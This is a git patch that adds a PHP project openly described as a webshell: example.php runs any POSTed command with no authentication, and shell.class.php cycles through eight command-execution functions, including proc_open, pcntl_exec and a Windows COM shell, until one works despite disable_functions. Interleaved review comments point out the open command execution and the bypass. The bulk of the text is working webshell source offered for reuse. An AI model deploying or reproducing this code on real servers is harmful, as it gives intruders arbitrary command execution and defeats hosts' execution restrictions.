From ed02323e8522174b9e8833045fa7d3f919fe3995 Mon Sep 17 00:00:00 2001 From: xiaoqidun Date: Fri, 7 Aug 2020 12:11:17 +0800 Subject: [PATCH] =?UTF-8?q?feat(=E9=A1=B9=E7=9B=AE=E6=96=87=E4=BB=B6):=20?= =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E9=A1=B9=E7=9B=AE=E6=96=87=E4=BB=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .gitignore | 1 + README.md | 17 +++- example.php | 103 ++++++++++++++++++++ shell.class.php | 251 ++++++++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 371 insertions(+), 1 deletion(-) create mode 100644 .gitignore create mode 100644 example.php create mode 100644 shell.class.php diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..9f11b75 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +.idea/ diff --git a/README.md b/README.md index fd0662a..25d6cc8 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,17 @@ -# shell +# 简而言之 大概是PHP最强大的SHELL执行类了 +# 系统兼容 +PHP 5.4 + (主要是用了中括号数组,改掉中括号数组可以要求更低) +# 使用说明 +## 示范代码 +```php + +``` +## example.php +这是一个使用shell.class.php实现的webshell工具,用于shell类演示。 +# 授权说明 +使用本类库你唯一需要做的就是把LICENSE文件往你用到的项目中拷贝一份。 \ No newline at end of file diff --git a/example.php b/example.php new file mode 100644 index 0000000..d87e865 --- /dev/null +++ b/example.php @@ -0,0 +1,103 @@ + + */ +$command = isset($_POST['command']) ? strval($_POST['command']) : ""; +if ($command !== "") { + require 'shell.class.php'; + echo shell::command($command, "echo pwd", true); + exit; +} +?> + + + web shell + + + + + +

+

+
+ CopyRight © 2017- xiaoqidun@gmail.com All Rights Reserved +
+ + \ No newline at end of file diff --git a/shell.class.php b/shell.class.php new file mode 100644 index 0000000..f9e43b3 --- /dev/null +++ b/shell.class.php 
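Review bot: `$_POST['command']` goes straight into `shell::command()` with no authentication, origin check or allow-list, so any client that can reach example.php runs arbitrary commands as the web-server user; the README added in this same commit describes the file as a webshell demo. If the demo has to stay in the repository, it should refuse to run outside PHP's built-in development server, e.g. `if (PHP_SAPI !== 'cli-server') { http_response_code(403); exit; }` placed before `$_POST` is read, and the file should be kept out of any deployed document root. The command output is also echoed with no content type, so `header('Content-Type: text/plain; charset=utf-8');` before the `echo` keeps a browser from interpreting it as HTML. The markup after `?>` is not visible in this copy of the patch, so the form and its script were not reviewed.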
@@ -0,0 +1,251 @@
+
+ */
+
+class shell
+{
+ public static $version = 'v1.0.0';
+
+ public static function Convert($string, $to = 'utf-8', $from = 'auto,cp936')
+ {
+ $func = 'mb_convert_encoding';
+ if (!function_exists($func)) {
+ return $string;
+ }
+ return $func($string, $to, $from);
+ }
+
+ public static function Command($command, $testCommand = null, $convert = false)
+ {
+ $typeA = 'proc_open';
+ $typeB = 'shell_exec';
+ $typeC = 'exec';
+ $typeD = 'system';
+ $typeE = 'passthru';
+ $typeF = 'popen';
+ $typeG = 'pcntl_exec';
+ $typeH = 'com';
+ $typeRank = [
+ $typeH,
+ $typeA,
+ $typeB,
+ $typeD,
+ $typeE,
+ $typeC,
+ $typeF,
+ $typeG
+ ];
+ if (!is_array($command)) $command = [$command];
+ if (!is_array($testCommand) && $testCommand !== null) $testCommand = [$testCommand];
+ $commandFunctions = [
+ $typeA => [
+ 'command' =>
+ function ($command) {
+ $cmd = "exec " . self::GetShellFile();
+ if (defined('PHP_WINDOWS_VERSION_BUILD')) {
+ $cmd = self::GetShellFile();
+ }
+ if (!is_resource($sh = proc_open($cmd, [
+ 0 =>
+ ["pipe", "r"],
+ 1 =>
+ ["pipe", "w"]
+ ], $pipes))) {
+ return false;
+ }
+ foreach ($command as $commandLine) {
+ fwrite($pipes[0], $commandLine . PHP_EOL);
+ }
+ fclose($pipes[0]);
+ $result = stream_get_contents($pipes[1]);
+ fclose($pipes[1]);
+ proc_close($sh);
+ return $result;
+ },
+ 'function' =>
+ [
+ 'proc_open',
+ 'stream_get_contents'
+ ]
+ ],
+ $typeB => [
+ 'command' => function ($command) {
+ $commandResult = "";
+ foreach ($command as $commandLine) {
+ $commandResult .= shell_exec($commandLine);
+ }
+ return $commandResult;
+ },
+ 'function' => [
+ 'shell_exec'
+ ]
+ ],
+ $typeC => [
+ 'command' => function ($command) {
+ $commandResult = "";
+ foreach ($command as $commandLine) {
+ exec($commandLine, $commandOutput);
+ $commandResult .= implode(PHP_EOL, $commandOutput);
+ }
+ return $commandResult;
+ },
+ 'function' => [
+ 'exec'
+ ]
+ ],
+ $typeD => [
+ 'command' => function ($command) {
+ ob_start();
+ foreach ($command as $commandLine) {
+ system($commandLine);
+ }
+ $commandResult = ob_get_clean();
+ return $commandResult;
+ },
+ 'function' => [
+ 'system',
+ 'ob_start',
+ 'ob_get_clean'
+ ]
+ ],
+ $typeE => [
+ 'command' => function ($command) {
+ ob_start();
+ foreach ($command as $commandLine) {
+ passthru($commandLine);
+ }
+ $commandResult = ob_get_clean();
+ return $commandResult;
+ },
+ 'function' => [
+ 'passthru',
+ 'ob_start',
+ 'ob_get_clean'
+ ]
+ ],
+ $typeF => [
+ 'command' => function ($command) {
+ $commandResult = "";
+ foreach ($command as $commandLine) {
+ $p = popen($commandLine, "r");
+ while (!feof($p)) {
+ $commandResult .= fgets($p);
+ }
+ }
+ },
+ 'function' => [
+ 'popen'
+ ]
+ ],
+ $typeG => [
+ 'command' => function ($command) {
+ $command[] = '';
+ $outputFile = tempnam(null, 'commandOutput_');
+ $outputFilePipe = sprintf(" >> %s 2>&1%s", $outputFile, PHP_EOL);
+ $commandString = implode($outputFilePipe, $command);
+ $commandProcess = pcntl_fork();
+ if ($commandProcess == 0) {
+ pcntl_exec(self::GetShellFile(), ["-c", $commandString]);
+ }
+ pcntl_waitpid($commandProcess, $status);
+ $commandResult = file_get_contents($outputFile);
+ unlink($outputFile);
+ return $commandResult;
+ },
+ 'function' => [
+ 'pcntl_exec',
+ 'pcntl_fork',
+ 'pcntl_waitpid'
+ ]
+ ],
+ $typeH => [
+ 'command' => function ($command) {
+ $commandResult = "";
+ try {
+ $ws = new \COM("wscript.shell");
+ $exec = $ws->Exec(self::GetShellFile());
+ foreach ($command as $commandLine) {
+ $exec->StdIn->WriteLine("$commandLine");
+ }
+ $exec->StdIn->WriteLine("exit");
+ $exec->StdIn->Close();
+ while (0 === $exec->Status) {
+ time_nanosleep(0, 1e8);
+ }
+ $commandResult = $exec->StdOut->ReadAll() . $exec->StdErr->ReadAll();
+ } catch (\Exception $exception) {
+
+ }
+ return $commandResult;
+ },
+ 'class' => [
+ '\COM'
+ ]
+ ]
+ ];
+ foreach ($commandFunctions as $tag => $item) {
+ if (isset($item['class'])) {
+ foreach ($item['class'] as $cls) {
+ if (!class_exists($cls)) {
+ unset($func);
+ unset($commandFunctions[$tag]);
+ }
+ }
+ }
+ if (isset($item['function'])) {
+ foreach ($item['function'] as $func) {
+ if (!function_exists($func)) {
+ unset($func);
+ unset($commandFunctions[$tag]);
+ break;
+ }
+ unset($func);
+ }
+ }
+ unset($tag);
+ unset($item);
+ }
+ if ($testCommand !== null) {
+ foreach ($commandFunctions as $tag => $item) {
+ $commandResult = $item['command']($testCommand);
+ if (1 > strlen($commandResult)) {
+ unset($commandFunctions[$tag]);
+ }
+ unset($tag);
+ unset($item);
+ }
+ }
+ foreach ($typeRank as $type) {
+ if (isset($commandFunctions[$type])) {
+ $commandReturn = $commandFunctions[$type]['command']($command);
+ if ($convert) {
+ return self::Convert($commandReturn);
+ }
+ return $commandReturn;
+ }
+ unset($type);
+ }
+ return false;
+ }
+
+ public static function GetShellFile()
+ {
+ $shellFileList = [
+ 'C:\Windows\System32\cmd.exe',
+ 'C:\Windows\SysWOW64\cmd.exe',
+ '/system/bin/sh',
+ '/bin/bash',
+ '/bin/sh'
+ ];
+ foreach ($shellFileList as $shellFile) {
+ if (is_executable($shellFile)) {
+ return $shellFile;
+ }
+ }
+ if (defined('PHP_WINDOWS_VERSION_BUILD')) {
+ return 'cmd.exe';
+ }
+ return 'sh';
+ }
+}
\ No newline at end of file
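Review bot: `Command()` has no docblock, and nothing tells a caller that every entry of `$command` is handed to a shell unescaped by whichever back end survives the probe (`proc_open`, `shell_exec`, `exec`, `system`, `passthru`, `popen`, `pcntl_exec`, `COM`). I would add above the method `/** Runs each entry of $command verbatim in a system shell; nothing is escaped or validated, so never pass request-derived strings. */`. Because the probe walks all eight primitives, a host that relies on `disable_functions` to block command execution has to list every one of them for the restriction to hold against this class. In the `pcntl_exec` closure the child has no `exit` after `pcntl_exec()` and a `pcntl_fork()` result of -1 is not checked, so a failed exec leaves a second copy of the request running in the worker; `exit(127);` after the `pcntl_exec(...)` line closes that. The empty `catch (\Exception $exception) { }` in the COM closure discards the failure reason and should at least call `error_log($exception->getMessage());`.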